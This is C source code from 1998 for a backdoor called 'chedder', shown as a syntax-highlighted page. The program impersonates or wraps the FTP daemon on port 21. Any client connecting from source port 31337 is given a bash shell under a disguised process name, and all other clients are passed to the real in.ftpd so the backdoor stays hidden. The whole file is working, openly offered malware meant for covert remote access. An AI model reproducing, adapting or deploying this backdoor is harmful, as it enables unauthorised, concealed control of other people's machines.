/*
 * chedder - gellch@mindspring.com
 *
 * source port authenticating shell-binding backdoor.should compile on just 
 * about everything checks to see if it was called from inetd or independently
 * and behaves accordingly(accordingly being that it handles One connection 
 * regardless of if it was a legit one or not when executed independently.)
 * - cheddar oct '98
 *
 * p.s. netcat allows you to set the source port of connections. 
 */
 
#define LISPORT "0021"    /* the quoted decimal port that we listen on       */
#define HACKPORT 31337    /* unqoted decimal port that gets shell acess      */
#define SHELL "/bin/bash" /* look at line 108 to change argv[0]              */
#define DAEMON "/usr/sbin/in.ftpd" /* legitimate daemon to execute see line  */
#include <stdio.h>                 /* 103 for argv info.                     */
#include <stdlib.h>                
#include <errno.h>
#include <netinet/in.h>
#include <sys/socket.h>

extern int errno;

int main (int argc, char *argv[])
{
   int i;
   int remoteport;
   int son_of_inetd = 0;
   int ld; /* listen'n socket  descriptor */
   int sd; /* accepted socket descriptor */
   int addrlen;
   struct sockaddr_in sock;
   struct sockaddr_in remote;
   
   if (  (ld = socket(AF_INET, SOCK_STREAM, 0)) < 0)
     {
       perror("socket:");
       exit(1);
    }
   /*
    * we do this so that we can figure out if we were called from inetd 
    * or we should run as a independent daemon, and behave accordingly. 
    */
   i = 1;
   if ( setsockopt(ld, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(int)) < 0) 
      {
      perror("setsockopt:");
      exit(1);
    }
   
   sock.sin_family = AF_INET;
   sock.sin_addr.s_addr = INADDR_ANY;
   sock.sin_port = htons(strtol(LISPORT, (char **) NULL, 10)); 
   
   if ( bind(ld, &sock, sizeof(sock)) < 0)
     {  
	if (errno == EADDRINUSE) {/* perhaps this needs a little explainin   */
   	   close(ld);             /* we can asumme that we were called from  */  
	   son_of_inetd = 1;      /* inetd if errno = EADDRINUSE therefore we*/
        }                         /* close ld, set son_of_inetd and continue*/
	if (!son_of_inetd) {
	perror("bind:");         
	   exit(1);              
        }                       
     }                             
                                   
   if (!son_of_inetd) { 
 
      if ( listen(ld, 3) < 0 )
      { 
	perror("listen:");
       	exit(1);
      }

     if ( (sd = accept(ld, (struct sockaddr *) &remote, &addrlen)) == -1 )
	{
        perror("accept");
	exit(1);
	}
   
     getpeername(sd, &remote, &addrlen);
     remoteport = ntohs(remote.sin_port);
  }
   else { /* we were called from inetd. */
        getpeername(0, &remote, &addrlen);
        remoteport = ntohs(remote.sin_port);
  } 

   if ( remoteport == HACKPORT) {
          if( fork() == 0) { 
             if( !son_of_inetd ) {
                 close(0); close(1); close(2); 
                 dup2(sd, 0); dup2(sd, 1); dup2(sd, 2);
	     }
           printf("shell access granted. enjoy.\n");
           execl(SHELL, "inconspicuous process", 0); /* changes this. */
	  } 
   } 
  else { /* setup the fd's and execute the usual daemon. */
       if( fork() == 0) {
       	   if( !son_of_inetd ) {
      	       close(0); close(1); close(2);
	       dup2(sd, 0); dup2(sd, 1); dup2(sd, 2);
	      }
          execl(DAEMON, "in.ftpd", 0);    /* maybe this too. */
       }
  } 

close(sd);

}


syntax highlighted by Code2HTML, v. 0.9.1